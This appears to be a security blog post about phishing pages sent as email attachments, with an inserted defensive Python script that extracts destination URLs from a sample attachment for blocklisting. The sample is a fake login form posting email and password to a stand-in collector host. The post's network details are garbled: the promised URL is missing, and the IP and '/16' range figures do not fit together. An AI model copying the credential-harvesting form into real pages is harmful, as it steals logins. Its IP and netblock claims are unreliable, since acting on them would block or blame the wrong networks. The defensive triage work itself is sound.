There seems to be a trend over the past 6 months of switching from links directly in the phishing e-mails to having the entire phishing page in the e-mail itself (as an attachment). Others in the security arena have already publicised this for the most part, so I'll skip over the details.
I wonder, however, why our dear scammer has done this. I know it's to try and bypass phishing and junk filters, but given they still need to process the details they're stealing, they're not making it any harder to stop them. It takes two seconds for me to open up the attachment in an editor and identify the URL the details will be submitted to, or the user will be taken to, and pop that into any number of the available blacklists (or, if I can, simply have the site/server shut down). All they're doing is making it far easier for us to say "hey victim, notice the attachment? Your e-mail client will (if using Outlook, for example) already block known malicious extensions, so just, err, don't open the rest of them and you'll be fine for the most part".
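As an added example (not from the original post), here is a small Python script that does that triage step automatically: it parses a constructed sample of an HTML attachment and pulls out the form action, meta-refresh and plain JavaScript redirect targets, so they can be checked against the legitimate site and submitted to blocklists. The sample markup and hostnames are made up.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of an HTML phishing attachment (not a real capture):
# a fake login form posting to a collector host, a meta-refresh and a
# JavaScript redirect of the kind used to bounce the victim to the real site.
SAMPLE_ATTACHMENT = """
<html><head>
<meta http-equiv="refresh" content="0;url=https://legit.example/done">
</head><body>
<form method="POST" action="http://collector.example/submit.php">
  <input name="email"><input name="password" type="password">
</form>
<script>setTimeout(function(){window.location='https://other.example/';},3000);</script>
</body></html>
"""

# Plain assignments to (window.)location(.href); obfuscated scripts still need manual review.
JS_LOCATION = re.compile(r'(?:window\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
META_URL = re.compile(r'url\s*=\s*["\']?([^"\'\s]+)', re.I)


class _DestinationParser(HTMLParser):
    """Collect <form action> targets and <meta http-equiv=refresh> URLs."""

    def __init__(self):
        super().__init__()
        self.found = set()

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form" and a.get("action"):
            self.found.add(("form_action", a["action"].strip()))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL.search(a.get("content", ""))
            if m:
                self.found.add(("meta_refresh", m.group(1)))


def extract_destinations(html):
    """Return sorted (kind, url) pairs the attachment would send the victim or their data to."""
    p = _DestinationParser()
    p.feed(html)
    found = set(p.found)
    found |= {("js_redirect", u) for u in JS_LOCATION.findall(html)}
    return sorted(found)


def destination_hosts(html):
    """Hostnames to triage; drop the legitimate site before submitting the rest to a blocklist."""
    return sorted({urlparse(u).hostname for _, u in extract_destinations(html) if urlparse(u).hostname})
```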
In addition, whilst average Joe is already taken in quite frequently by phishing scams, I'd hope (yep, I know) they'd see it and think "hang on a second, my bank/PayPal/whatever is an actual site, not an attachment" (I know what you're going to say here, so I'll save you the trouble: the problem is, as much as we'd like it not to, this does actually sometimes work; users are far too gullible). Point is, most gullible users (I hate that word too) run whatever security was pre-installed, so Norton, McAfee, etc., which whilst mostly useless does actually stop *some* phishing scams, and IE with its SmartScreen filter will still block those identified as phishing scams, so this isn't going to make the scammer's life any easier.
The URL in this case, anyway, is:
This simply redirects to PayPal if accessed directly (and will do the same for the victim, once it has saved the details they entered into the form contained in the attachment they were sent).
The IP, 18.104.22.168, belongs to AS4134 CHINANET-BACKBONE, a range well known for everything from exploits to phishing to pretty much everything else. My personal recommendation is to block the entire /16 (22.214.171.124-126.96.36.199), but that's just me (I've seen far too much malicious activity across all of the CHINANET-BACKBONE ranges, with only a handful of legit sites being seen).
As an aside, I have noticed the hpHosts server having sporadic timeout issues when displaying query results (e.g. netblock information when querying an IP), and I am looking into this.